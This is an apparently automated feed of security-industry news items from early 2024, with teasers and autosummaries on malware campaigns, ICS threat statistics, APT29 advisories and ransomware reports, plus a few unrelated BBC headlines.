    According to the UAE Cybersecurity Council, in 2023, the UAE repelled over 50,000 cyberattacks daily. These findings, highlighted in a report from Frost & Sullivan (F&S), show the exponential growth of the region’s cybersecurity landscape – and serve as a sobering reminder of the rising threats that accompany it. As the GCC (Gulf Cooperation Council) cybersecurity industry continues to grow—F&S estimates it will triple in value by 2030 to reach $13.4 billion—countries in the region … More

    The post Regulatory measures boost cybersecurity industry appeared first on Help Net Security.

    "

    Autosummary: Building a cyber resilient posture. Saudi Arabia, the UAE, and Bahrain have also established the National Cybersecurity Authority, the National Electronic Security Authority, and the National Cybersecurity Centre, respectively, to oversee ongoing industry efforts. "


    Threat landscape for industrial automation systems. Statistics for H2 2023

    industry
    2024-03-19 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-statistics-for-h2-2023/
    The statistical data presented in the report was received from ICS computers protected by Kaspersky products that Kaspersky ICS CERT categorizes as part of the industrial infrastructure at organizations. "

    Autosummary: 2023 in numbers

    Parameter                                                    H1 2023   H2 2023   2023
    Global percentage of attacked ICS computers                    34.0%     31.9%   38.6%
    Main threat sources
      Internet                                                     19.3%     18.1%   22.8%
      Email clients                                                 6.0%      4.0%    5.4%
      Removable media                                               3.4%      1.9%    3.2%
      Network folders                                               0.49%     0.25%   0.45%
    Percentage of ICS computers on which malicious objects from different categories were blocked
      Malicious scripts and phishing pages (JS and HTML)           12.7%     10.9%   14.7%
      Denylisted internet resources                                11.3%     10.1%   13.7%
      Spy Trojans, backdoors and keyloggers                         6.1%      5.3%    7.1%
      Malicious documents (Microsoft Office and PDF)                4.0%      2.9%    4.0%
      Worms                                                         2.3%      2.1%    3.0%
      Viruses                                                       2.4%      2.1%    2.8%
      Web miners running in browsers                                1.3%      0.76%   1.3%
      Miners in the form of executable files for Windows            0.59%     0.85%   1.1%
      Ransomware                                                    0.32%     0.25%   0.37%

    2023: back to the minimum. Following the increase of 2021 and 2022, the percentage of ICS computers on which malicious objects were blocked dropped by 2 pp and returned to the same level as in 2020.

    Regions. Africa leads the rankings for: percentage of ICS computers on which spyware was blocked; percentage of ICS computers on which worms were blocked; percentage of ICS computers on which web miners were blocked; percentage of ICS computers on which removable media threats were blocked.

    This group includes Windows computers that serve one or several of the following purposes: supervisory control and data acquisition (SCADA) servers; data storage (Historian) servers; data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; human machine interface (HMI); OT network administration computers; ICS software development computers. We consider a computer as attacked if a Kaspersky security solution blocked one or more threats on that computer during the period in review: a month, six months, or a year depending on the context, as can be seen in the charts above.

    [Figure: Percentage of ICS computers on which malicious objects from various sources were blocked, 2020–2023]

    Red lines of 2023. By the end of 2023, the percentage of ICS computers on which malicious objects were blocked increased in two regions: Eastern Europe, by 4.4 pp; Western Europe, by 3.5 pp.

    [Figure: Regions and world. Percentage of ICS computers on which malicious objects from various sources were blocked]
    [Figure: Percentage of ICS computers on which threats from network folders were blocked]

    As in the case of the statistics across all threats, the percentage of ICS computers where malicious objects from various sources were blocked varied with region.

    [Figure: Percentage of ICS computers on which malicious objects were blocked, January–December 2022 and 2023]

    In Eastern Europe, H1 2023 saw the lowest figures since 2020, and H2 the highest percentage of attacked ICS computers in 2020–2023 (30.9%).

    [Figure: Fifteen countries and territories with the highest percentage of ICS computers on which spyware was blocked, H2 2023]

    Ransomware. In the second half of 2023, the percentage of ICS computers on which ransomware was blocked dropped to the four-year minimum of 0.25%.

    [Figure: Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, H2 2023]

    The percentage of ICS computers on which malicious objects in this category were blocked increased in six regions within the six-month period, most of all in Eastern Europe (by 2.9 pp).

    [Figure: Regions ranked by percentage of ICS computers on which malicious email attachments and phishing links were blocked, H2 2023]

    Removable media. As before, Africa led the regional ranking by percentage of ICS computers on which removable media threats were blocked.

    [Figure: Regions ranked by percentage of ICS computers on which denylisted internet resources were blocked, H2 2023]

    Tajikistan and Yemen led the country ranking by percentage of ICS computers on which denylisted internet resources were blocked, with 18.2% and 16.6%, respectively.

    [Figure: Regions ranked by percentage of ICS computers on which malicious documents were blocked, H2 2023]

    Greece and Mexico led the country and territory ranking by percentage of ICS computers on which malicious documents were blocked, with 9.4% and 8.5%, respectively.

    [Figure: Ten countries and territories with the lowest percentage of ICS computers on which malicious objects were blocked in H2 2023]

    Selected industries. In H2 2023, building automation once again had the highest percentage of ICS computers on which malicious objects were blocked of all industries that we studied.

    [Figure: Percentage of ICS computers on which malicious objects were blocked, by month, 2021–2023]

    In terms of month-to-month fluctuations, the year 2023 differs from the two that preceded it, while being closer to 2021 than to 2022.

    [Figure: Regions ranked by percentage of ICS computers on which browser-based web miners were blocked, H2 2023]

    Yemen (3.9%) and Serbia (3.5%) topped the ranking of countries and territories by percentage of ICS computers on which web miners were blocked.

    [Figure: Percentage of ICS computers on which malicious objects were blocked, by half year, 2020–2023]

    The percentage of attacked ICS computers in Western Europe each month in 2023, with the exception of January, represented a year-on-year increase. "


    New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics

    exploits industry
    2024-03-18 https://thehackernews.com/2024/03/new-deepgosu-malware-campaign-targets.html
    A new elaborate attack campaign has been observed employing PowerShell and VBScript malware to infect Windows systems and harvest sensitive information. Cybersecurity company Securonix, which dubbed the campaign DEEP#GOSU, said it's likely associated with the North Korean state-sponsored group tracked as Kimsuky. "The malware payloads used in the DEEP#GOSU represent a "

    Autosummary: The second-stage PowerShell script, for its part, fetches a new file from Dropbox ("r_enc.bin"), a .NET assembly file in binary form that's actually an open-source remote access trojan known as TruRat (aka TutRat or C# RAT) with capabilities to record keystrokes, manage files, and facilitate remote control. Also retrieved by the PowerShell script from Dropbox is a VBScript ("info_sc.txt"), which, in turn, is designed to run arbitrary VBScript code retrieved from the cloud storage service, including a PowerShell script ("w568232.ps12x"). "


    Ande Loader Malware Targets Manufacturing Sector in North America

    exploits industry
    2024-03-14 https://thehackernews.com/2024/03/ande-loader-malware-targets.html
    The threat actor known as Blind Eagle has been observed using a loader malware called Ande Loader to deliver remote access trojans (RATs) like Remcos RAT and NjRAT. The attacks, which take the form of phishing emails, targeted Spanish-speaking users in the manufacturing industry based in North America, eSentire said. Blind Eagle (aka APT-C-36) is a financially motivated threat actor "

    Autosummary: "


    Tech support firms Restoro, Reimage fined $26 million for scare tactics

    industry
    2024-03-14 https://www.bleepingcomputer.com/news/security/tech-support-firms-restoro-reimage-fined-26-million-for-scare-tactics/
    Tech support companies Restoro and Reimage will pay $26 million to settle charges that they used scare tactics to trick their customers into paying for unnecessary computer repair services. [...] "

    Autosummary: While the devices used to test the purchased software and services had no performance or security issues and were also running antivirus software, scanning them "revealed" hundreds of issues requiring repair, including "PC Privacy issues," "Junk files," "Crashed Programs," and "Broken Registry issues. "


    Image-based phishing tactics evolve

    financial industry
    2024-03-12 https://www.helpnetsecurity.com/2024/03/12/image-based-phishing-attacks/

    While 70% of organizations feel their current security stacks are effective against image-based and QR code phishing attacks, 76% were still compromised in the last 12 months, according to IRONSCALES and Osterman Research. IT pros are highly aware of emerging types of phishing attacks: 93% of IT and security professionals are aware of image-based phishing attacks targeting their organizations, and 79% say the same about QR code attacks. 76% of organizations were still compromised by … More

    The post Image-based phishing tactics evolve appeared first on Help Net Security.

    "

    Autosummary: IT pros are highly aware of emerging types of phishing attacks: 93% of IT and security professionals are aware of image-based phishing attacks targeting their organizations, and 79% say the same about QR code attacks. "


    AuditBoard unveils AI, analytics, and annotation capabilities to deliver more timely insights

    industry
    2024-03-12 https://www.helpnetsecurity.com/2024/03/12/auditboard-ai/

    AuditBoard revealed powerful new AI, analytics, and annotation capabilities to help corporate risk, compliance, and assurance teams, including internal audit and SOX functions, improve collaboration with stakeholders, do more with less, and deliver more timely insights. These robust new enhancements to the internal audit, SOX, and controls management capabilities of AuditBoard’s modern connected risk platform deliver relevant insights faster while navigating a dynamic market environment rife with increasing risks, regulations, and business requirements: AuditBoard AI … More

    The post AuditBoard unveils AI, analytics, and annotation capabilities to deliver more timely insights appeared first on Help Net Security.

    "

    Autosummary: "


    Email security trends in the energy and infrastructure sector

    industry
    2024-03-11 https://www.helpnetsecurity.com/2024/03/11/energy-and-infrastructure-organizations-attacks-video/

    In this Help Net Security video, Mike Britton, CISO at Abnormal Security, discusses how energy and infrastructure organizations face an increased risk of business email compromise and vendor email compromise attacks. According to Abnormal Security data, from February 2023 to July 2023, the average number of BEC weekly attacks was 0.53 per 1,000 mailboxes. BEC attacks increased by 18% in the following six months, reaching a weekly average of 0.63 attacks per 1,000 mailboxes. Business … More

    The post Email security trends in the energy and infrastructure sector appeared first on Help Net Security.

    "

    Autosummary: "


    Advanced AI, analytics, and automation are vital to tackle tech stack complexity

    industry
    2024-03-11 https://www.helpnetsecurity.com/2024/03/11/advanced-ai-analytics-and-automation-are-vital-to-tackle-tech-stack-complexity/

    97% of technology leaders find traditional AIOps models are unable to tackle the data overload, according to Dynatrace. Organizations are drowning in data: the research reveals that organizations are continuing to embrace multi-cloud environments and cloud-native architectures to enable rapid transformation and deliver secure innovation. However, despite the speed, scale, and agility enabled by these modern cloud ecosystems, organizations are struggling to manage the explosion of data they create. These research findings underscore the need … More

    The post Advanced AI, analytics, and automation are vital to tackle tech stack complexity appeared first on Help Net Security.

    "

    Autosummary: By unifying diverse data, retaining its context, and powering analytics and automation with a hypermodal AI that combines multiple techniques, including causal, predictive, and generative AI, teams can unlock a wealth of insights from their data to drive smarter decision-making, intelligent automation, and more efficient ways of working,” Greifeneder concluded. "


    Currys takeover move scrapped by US firm Elliot

    industry
    2024-03-11 https://www.bbc.co.uk/news/business-68532445
    Investment firm Elliot says it will not bid for the retailer after being rejected "multiple times". "

    Autosummary: "


    New Banking Trojan CHAVECLOAK Targets Brazilian Users via Phishing Tactics

    financial exploits latam industry
    2024-03-11 https://thehackernews.com/2024/03/new-banking-trojan-chavecloak-targets.html
    Users in Brazil are the target of a new banking trojan known as CHAVECLOAK that's propagated via phishing emails bearing PDF attachments. "This intricate attack involves the PDF downloading a ZIP file and subsequently utilizing DLL side-loading techniques to execute the final malware," Fortinet FortiGuard Labs researcher Cara Lin said. The attack chain involves the use of "

    Autosummary: "The malware facilitates various actions to steal a victim's credentials, such as allowing the operator to block the victim's screen, log keystrokes, and display deceptive pop-up windows," Lin said. "


    Identiv releases bitse.io 3.0, simplifying the deployment of IoT applications

    industry
    2024-03-08 https://www.helpnetsecurity.com/2024/03/08/identiv-bitse-io-3-0/

    Identiv launched bitse.io 3.0, the latest iteration of its global IoT connecting cloud platform. The updated platform offers advanced features designed to transform applications in supply chain management, brand protection, and customer engagement. bitse.io simplifies the deployment of innovative IoT applications, enabling customers to rapidly bring solutions with the latest radio-frequency identification (RFID) and IoT technologies to market. With native support for encrypted and tamper-proof tags based upon the top RFID and IoT chips from … More

    The post Identiv releases bitse.io 3.0, simplifying the deployment of IoT applications appeared first on Help Net Security.

    "

    Autosummary: "


    Web-based PLC malware: A new potential threat to critical infrastructure

    exploits industry
    2024-03-07 https://www.helpnetsecurity.com/2024/03/07/web-based-plc-malware/

    A group of researchers from Georgia Tech’s College of Engineering have developed web-based programmable logic controller (PLC) malware able to target most PLCs produced by major manufacturers. “Our Web-Based (WB) PLC malware resides in PLC memory, but ultimately gets executed client-side by various browser-equipped devices throughout the ICS environment. From there, the malware uses ambient browser-based credentials to interact with the PLC’s legitimate web APIs to attack the underlying real-world machinery,” the researchers explained. What … More

    The post Web-based PLC malware: A new potential threat to critical infrastructure appeared first on Help Net Security.

    "

    Autosummary: The advantages of web-based PLC malware: PLCs having embedded webservers means that attackers don’t need network or physical access to deliver the malware – they can simply lure an ICS operator to view an attacker-controlled website that exploits a cross-origin resource sharing (CORS) misconfiguration vulnerability to transfer a web page with malicious JavaScript code to the webserver. "


    CISA warns against using hacked Ivanti devices even after factory resets

    industry
    2024-02-29 https://www.bleepingcomputer.com/news/security/cisa-warns-against-using-hacked-ivanti-devices-even-after-factory-resets/
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed today that attackers who breached Ivanti appliances using one of multiple actively exploited vulnerabilities can maintain root persistence even after performing factory resets. [...] "

    Autosummary: On February 1st, in response to the "substantial threat" and increased risk of security breaches posed by hacked Ivanti VPN appliances, CISA ordered all federal agencies to disconnect all Ivanti Connect Secure and Ivanti Policy Secure instances from their networks within 48 hours. The agencies were mandated to export configurations, factory reset them, rebuild them using patched software versions released by Ivanti, reimport the backed-up configs, and revoke all connected or exposed certificates, keys, and passwords to be able to bring the isolated devices back online. "


    New Bifrost malware for Linux mimics VMware domain for evasion

    exploits industry Linux
    2024-02-29 https://www.bleepingcomputer.com/news/security/new-bifrost-malware-for-linux-mimics-vmware-domain-for-evasion/
    A new Linux variant of the Bifrost remote access trojan (RAT) employs several novel evasion techniques, including the use of a deceptive domain that was made to appear as part of VMware. [...] "

    Autosummary: "


    CISA cautions against using hacked Ivanti VPN gateways even after factory resets

    industry
    2024-02-29 https://www.bleepingcomputer.com/news/security/cisa-cautions-against-using-hacked-ivanti-vpn-gateways-even-after-factory-resets/
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed today that attackers who hack Ivanti VPN appliances using one of multiple actively exploited vulnerabilities may be able to maintain root persistence even after performing factory resets. [...] "

    Autosummary: On February 1st, in response to the "substantial threat" and increased risk of security breaches posed by hacked Ivanti VPN appliances, CISA ordered all federal agencies to disconnect all Ivanti Connect Secure and Ivanti Policy Secure instances from their networks within 48 hours. The agencies were mandated to export configurations, factory reset them, rebuild them using patched software versions released by Ivanti, reimport the backed-up configs, and revoke all connected or exposed certificates, keys, and passwords to be able to bring the isolated devices back online. "


    Five Eyes Agencies Expose APT29's Evolving Cloud Attack Tactics

    industry
    2024-02-27 https://thehackernews.com/2024/02/five-eyes-agencies-expose-apt29s.html
    Cybersecurity and intelligence agencies from the Five Eyes nations have released a joint advisory detailing the evolving tactics of the Russian state-sponsored threat actor known as APT29. The hacking outfit, also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes, is assessed to be affiliated with the Foreign Intelligence Service (SVR) of the "

    Autosummary: "


    Oil spill spreads across Caribbean to Bonaire

    industry
    2024-02-27 https://www.bbc.co.uk/news/world-latin-america-68413102
    The oil from a capsized barge off the coast of Tobago is threatening Bonaire's mangrove forests. "

    Autosummary: "


    Steel giant ThyssenKrupp confirms cyberattack on automotive division

    industry ciber
    2024-02-26 https://www.bleepingcomputer.com/news/security/steel-giant-thyssenkrupp-confirms-cyberattack-on-automotive-division/
    Steel giant ThyssenKrupp confirms that hackers breached systems in its Automotive division last week, forcing them to shut down IT systems as part of its response and containment effort. [...] "

    Autosummary: "


    A cyber attack hit Thyssenkrupp Automotive Body Solutions business unit

    industry
    2024-02-26 https://securityaffairs.com/159611/hacking/thyssenkrupp-automotive-body-solutions-bu-cyberattack.html
    ThyssenKrupp disclosed a security breach that impacted its automotive division last week; in response to the attack, the company shut down IT systems. Steel giant ThyssenKrupp disclosed a security breach that impacted its Automotive division last week. The company shut down IT systems in response to the attack. The news of the attack was reported by the […] "

    Autosummary: A cyber attack hit Thyssenkrupp Automotive Body Solutions business unit. Pierluigi Paganini, February 26, 2024. ThyssenKrupp disclosed a security breach that impacted its automotive division last week; in response to the attack, the company shut down IT systems. "


    SVR Cyber Actors Adapt Tactics for Initial Cloud Access

    industry
    2024-02-23 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a

    How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure

    OVERVIEW

    This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear.

    The UK National Cyber Security Centre (NCSC) and international partners assess that APT29 is a cyber espionage group, almost certainly part of the SVR, an element of the Russian intelligence services. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and New Zealand Government Communications Security Bureau (GCSB) agree with this attribution and the details provided in this advisory.

    This advisory provides an overview of TTPs deployed by the actor to gain initial access into the cloud environment and includes advice to detect and mitigate this activity.

    PREVIOUS ACTOR ACTIVITY

    The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.

    SVR actors are also known for:

    • The supply chain compromise of SolarWinds software.

    Autosummary: How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure. OVERVIEW: This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear. PREVIOUS ACTOR ACTIVITY: The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations. MITIGATION AND DETECTION: A number of mitigations will be useful in defending against the activity described in this advisory: Use multi-factor authentication (/2-factor authentication/two-step verification) to reduce the impact of password compromises. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s "


      Critics say Final Fantasy Rebirth a stunning sequel

      industry
      2024-02-22 https://www.bbc.co.uk/news/newsbeat-68368620
      Reviews of the highly anticipated follow-up to 2020's Remake praise its open world and story. "

      Autosummary: "


      Apple’s iMessage gains industry-leading quantum security

      industry
      2024-02-21 https://www.computerworld.com/article/3713081/apples-imessage-gains-industry-leading-quantum-security.html#tk.rss_security

      Apple is preparing for future threats to iMessage by introducing upgraded encryption for its messaging service by using quantum computers.

      Think of it as state-of-the-art quantum security for messaging at scale, the company says, resulting in Apple's messaging system being more secure against both current and future foes.

      What is the protection?

      Announced on Apple’s Security Research blog, the new iMessage protection is called PQ3 and promises the “strongest security properties of any at-scale messaging protocol in the world.”

      "

      Autosummary: In this case, Apple’s security teams asked themselves what might happen if hackers, criminals, or state-backed rogue surveillance firms gathered vast quantities of encrypted iMessage data today in order to break that encryption using quantum computers tomorrow. Think of it as state-of-the-art quantum security for messaging at scale, the company says, resulting in Apple's messaging system being more secure against both current and future foes. Apple has submitted PQ3 to two leading security researchers who have verified the technology — Professor David Basin of the Information Security Group at ETH in Zurich, Switzerland, and Douglas Stebila, a University of Waterloo Professor. "


      Cactus ransomware gang claims the theft of 1.5TB of data from Energy management and industrial automation firm Schneider Electric

      exploits ransomware industry
      2024-02-20 https://securityaffairs.com/159353/hacking/cactus-ransomware-gang-schneider-electric.html
      The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric. The Cactus ransomware group claims responsibility for pilfering 1.5TB of data from the Energy management and industrial automation giant Schneider Electric. Schneider Electric is a multinational company that specializes in energy management, industrial automation, […] "

      Autosummary: Cactus ransomware gang claims the theft of 1.5TB of data from Energy management and industrial automation firm Schneider Electric. Pierluigi Paganini, February 20, 2024. The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric. "


      New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics

      industry
      2024-02-20 https://thehackernews.com/2024/02/new-malicious-pypi-packages-caught.html
      Cybersecurity researchers have discovered two malicious packages on the Python Package Index (PyPI) repository that were found leveraging a technique called DLL side-loading to circumvent detection by security software and run malicious code. The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded 537 and 166 times, respectively, "

      Autosummary: "


      ManageEngine unveils ML-powered exploit triad analytics feature

      exploits industry
      2024-02-20 https://www.helpnetsecurity.com/2024/02/20/manageengine-log360-siem-solution/

      ManageEngine released an ML-powered exploit triad analytics feature in its SIEM solution, Log360. Now, enterprises can knowledgeably trace the path of adversaries and mitigate breaches by providing complete contextual visibility into the exploit triad: users, entities and processes. Addressing the critical need for faster breach response: “Today’s cyberthreats masterfully blend into the fabric of legitimate activity, weaponizing stolen credentials, mimicking trusted processes and exploiting human vulnerabilities. These insidious tactics create a critical challenge: an extended … More

      The post ManageEngine unveils ML-powered exploit triad analytics feature appeared first on Help Net Security.

      "

      Autosummary: Highlights of ML-powered exploit triad analytics Log360’s threat detection and incident response (TDIR) module, Vigil IQ, features a dual-layered threat detection system released last year. "


      Iranian Hackers Target Middle East Policy Experts with New BASICSTAR Backdoor

      industry
      2024-02-19 https://thehackernews.com/2024/02/iranian-hackers-target-middle-east.html
      The Iranian-origin threat actor known as Charming Kitten has been linked to a new set of attacks aimed at Middle East policy experts with a new backdoor called BASICSTAR by creating a fake webinar portal. Charming Kitten, also called APT35, CharmingCypress, Mint Sandstorm, TA453, and Yellow Garuda, has a history of orchestrating a wide range of social engineering campaigns that cast a "

      Autosummary: Charming Kitten, also called APT35, CharmingCypress, Mint Sandstorm, TA453, and Yellow Garuda, has a history of orchestrating a wide range of social engineering campaigns that cast a wide net in their targeting, often singling out think tanks, NGOs, and journalists. "


      How BRICS Got “Rug Pulled” – Cryptocurrency Counterfeiting is on the Rise

      industry
      2024-02-19 https://securityaffairs.com/159318/cyber-crime/resecurity-warns-cryptocurrency-counterfeiting.html
      Resecurity has identified an increasing trend of cryptocurrency counterfeiting; the experts found several tokens impersonating major brands, government organizations and national fiat currencies. Resecurity has identified an increasing trend of cryptocurrency counterfeiting. Ongoing brand protection for Fortune 100 companies by the cybersecurity company uncovered several tokens impersonating major brands, government organizations and even national fiat currencies. […] "

      Autosummary: A notable example of this deceptive practice is the emergence of a counterfeit token named ‘BRICS’ recently detected by Resecurity, which exploited the focus on the investment interest and potential expansion of the BRICS intergovernmental organization, comprising countries like Brazil, Russia, India, China, South Africa, Egypt, Ethiopia, Iran, and the United Arab Emirates. "


      The staff shortage in India's special effects industry

      industry
      2024-02-19 https://www.bbc.co.uk/news/business-68017347
      With international studios sending more work to India, the industry is struggling to train enough staff. "

      Autosummary: "


      Offenders confused about ethics of AI child abuse

      industry
      2024-02-15 https://www.bbc.co.uk/news/technology-68297336
      A charity warns that creating or viewing such images is still illegal, even if the children are not real. "

      Autosummary: "


      5 free digital forensics tools to boost your investigations

      industry
      2024-02-15 https://www.helpnetsecurity.com/2024/02/15/free-digital-forensics-tools/

      Digital forensics plays a crucial role in analyzing and addressing cyberattacks, and it’s a key component of incident response. Additionally, digital forensics provides vital information for auditors, legal teams, and law enforcement agencies in the aftermath of an attack. Many cutting-edge digital forensics tools are on the market, but for those who cannot afford them, here’s a list of great free solutions to get you started. Autopsy: Autopsy is a digital forensics platform widely employed … More

      The post 5 free digital forensics tools to boost your investigations appeared first on Help Net Security.

      "

      Autosummary: It scans various inputs, including disk images, files, and directories, extracting organized information like email addresses, credit card numbers, JPEG images, and JSON fragments. "


      Understanding the tactics of stealthy hunter-killer malware

      exploits industry
      2024-02-15 https://www.helpnetsecurity.com/2024/02/15/hunter-killer-malware/

      Picus Security has revealed a rise in hunter-killer malware, highlighting a significant shift in adversaries’ capability to pinpoint and thwart advanced enterprise defenses, including next-gen firewalls, antivirus programs, and EDR systems. There was a 333% increase in malware that can actively target defensive systems in an attempt to disable them. The identification of hunter-killer malware: drawing parallels from the stealthy and offensive nature of hunter-killer submarines, these malware strains evade security measures with precision and … More

      The post Understanding the tactics of stealthy hunter-killer malware appeared first on Help Net Security.

      "

      Autosummary: The identification of hunter-killer malware: drawing parallels from the stealthy and offensive nature of hunter-killer submarines, these malware strains evade security measures with precision and proactively seek out and impair security tools, firewalls, logging services, audit systems, and other protective measures within an infected system. "


      Rise in cyberwarfare tactics fueled by geopolitical tensions

      industry ciber
      2024-02-14 https://www.helpnetsecurity.com/2024/02/14/matt-shelton-google-cloud-threat-actors-trends/

      In this Help Net Security interview, Matt Shelton, Head of Threat Research and Analysis at Google Cloud, discusses the latest Threat Horizons Report, which provides intelligence-derived trends, expertise, and recommendations on threat actors to help inform cloud customer security strategies in 2024. How have cyber threats evolved over the last year, and what trends are we seeing regarding attack vectors and methodologies? To some extent, cybersecurity fatigue and complacency have left gaps where threat actors … More

      The post Rise in cyberwarfare tactics fueled by geopolitical tensions appeared first on Help Net Security.

      "

      Autosummary: In this Help Net Security interview, Matt Shelton, Head of Threat Research and Analysis at Google Cloud, discusses the latest Threat Horizons Report, which provides intelligence-derived trends, expertise, and recommendations on threat actors to help inform cloud customer security strategies in 2024. Caveat: when talking about public-private partnerships, what is needed is real, operational and ongoing public-private collaboration, which is essential for sharing information, developing best practices, and mitigating risks, and for building a more secure and resilient cyber ecosystem. To some extent, cybersecurity fatigue and complacency have left gaps where threat actors have exploited old vulnerabilities, including gaps in logging and patching, to get a stalwart beachhead into the network. "


      Cybersecurity Tactics FinServ Institutions Can Bank On in 2024

      financial industry ciber
      2024-02-14 https://thehackernews.com/2024/02/cybersecurity-tactics-finserv.html
      The landscape of cybersecurity in financial services is undergoing a rapid transformation. Cybercriminals are exploiting advanced technologies and methodologies, making traditional security measures obsolete. The challenges are compounded for community banks that must safeguard sensitive financial data against the same level of sophisticated threats as larger institutions, but often with more "

      Autosummary: Financial firms report 703 cyberattack attempts per week.[1] On average, 270 attacks (entailing unauthorized access of data, applications, networks, or devices) occurred in financial services, an increase of 31% compared with the prior year.[2] Financial services businesses take an average of 233 days to detect and contain a data breach.[3] 43% of senior bank executives don't believe their bank is adequately equipped to protect customer data, privacy, and assets in the event of a cyberattack.[4] The average data breach cost in financial services is $5.72 million per incident.[5] State-sponsored cyberattacks also pose a unique threat to the financial sector. Similarly, in recent times, there has been a concerning trend where major service providers catering to small-medium-sized banks, such as FIS, Fiserv, and Jack Henry, have become prime targets for cyber-attacks. To effectively navigate this landscape, community banks must develop a deep understanding of relevant regulations, such as the GLBA, PCI DSS, SOX, and more. Advanced cloud security strategies: cloud computing, with its numerous benefits of scalability, flexibility, and cost-effectiveness, is increasingly being adopted by financial institutions. This involves creating a cohesive framework that combines advanced technology solutions, thorough policies and procedures, regular risk assessments, continuous monitoring, and proactive incident response planning. Additionally, outsourcing executive-level insights, such as a virtual Chief Information Security Officer (vCISO), can provide strategic guidance and governance to strengthen the bank's overall cybersecurity posture. "


      The art of digital sleuthing: How digital forensics unlocks the truth

      industry
      2024-02-14 https://www.welivesecurity.com/en/cybersecurity/digital-forensics-unlocks-truth/
      Learn how the cyber variety of CSI works, from sizing up the crime scene and hunting for clues to piecing together the story that the data has to tell. "

      Autosummary: As such, a typical digital forensics report: provides background information on the case; defines the scope of the investigation together with its objectives and limitations; describes the methods and techniques used; details the process of acquiring and preserving digital evidence; presents the results of the analysis, including discovered artifacts, timelines, and patterns; summarizes the findings and their significance in relation to the goals of the investigation. Lest we forget: the report needs to adhere to legal standards and requirements so that it can withstand legal scrutiny and serve as a crucial document in legal proceedings. With that in mind, digital forensics has a role to play in various contexts, including crime investigations, incident response, divorce and other legal proceedings, employee misconduct probes, counterterrorism efforts, fraud detection and data recovery. This art of uncovering, analyzing and interpreting digital evidence has seen substantial growth particularly in investigations involving various kinds of fraud and cybercrime, tax evasion, stalking, child exploitation, intellectual property theft, and even terrorism. "


      The future of cybersecurity: Anticipating changes with data analytics and automation

      industry ciber
      2024-02-13 https://www.helpnetsecurity.com/2024/02/13/mick-baccio-splunk-data-analytics-automation-role/

      In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses the future of cybersecurity, emphasizing the importance of data analytics and automation in addressing evolving threats. He points out the changes in threat tactics, the significance of automation in reducing human error, challenges in implementing data analytics, and envisions a future where AI-assistants transform cybersecurity operations. How have cybersecurity threats evolved in recent years, and what role do data analytics … More

      The post The future of cybersecurity: Anticipating changes with data analytics and automation appeared first on Help Net Security.

      "

      Autosummary: The landscape of cyber threats continues to further evolve, and recent high-profile data breaches (MOVEit, Accellion, GoAnywhere, etc.) underscore the gravity of the shift. For instance, complex multi-step incident response workflows, such as quarantining a host, blocking an indicator, and searching for additional compromised assets, can be automated to minimize the likelihood of costly oversights or missed steps. In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses the future of cybersecurity, emphasizing the importance of data analytics and automation in addressing evolving threats. "


      PikaBot Resurfaces with Streamlined Code and Deceptive Tactics

      industry
      2024-02-13 https://thehackernews.com/2024/02/pikabot-resurfaces-with-streamlined.html
      The threat actors behind the PikaBot malware have made significant changes to the malware in what has been described as a case of "devolution." "Although it appears to be in a new development cycle and testing phase, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications," Zscaler ThreatLabz researcher Nikolaos "

      Autosummary: "


      Ransomware tactics evolve, become scrappier

      exploits industry
      2024-02-12 https://www.helpnetsecurity.com/2024/02/12/ransomware-attacks-rise/

      As we enter 2024, ransomware remains the most significant cyberthreat facing businesses, according to Malwarebytes. Malwarebytes reveals that the United States accounted for almost half of all ransomware attacks in 2023. “Small and medium-sized organizations face a deluge of cyber threats daily including ransomware, malware and phishing attacks. This new data spotlights the pervasive cat-and-mouse game between cybercriminals and the security and IT teams on the front lines,” said Mark Stockley, Cybersecurity Evangelist, Malwarebytes ThreatDown … More

      The post Ransomware tactics evolve, become scrappier appeared first on Help Net Security.

      "

      Autosummary: The repeated use of zero-days also signaled a new level of sophistication making CL0P the second most active “big game” ransomware group of 2023, outpacing rivals that were active in every month of the year compared to just a few weeks of activity from CL0P. Lockbit also remained the most widely used ransomware-as-a-service, which accounted for more than twice as many attacks as its nearest competitor in 2023. "


      Brazil miss out on Olympics as Argentina win to qualify

      latam industry
      2024-02-12 https://www.bbc.co.uk/sport/football/68270697
      Two-time gold medallists Brazil will not feature in the Olympic men's football event for the first time since 2004 after losing to Argentina. "

      Autosummary: "


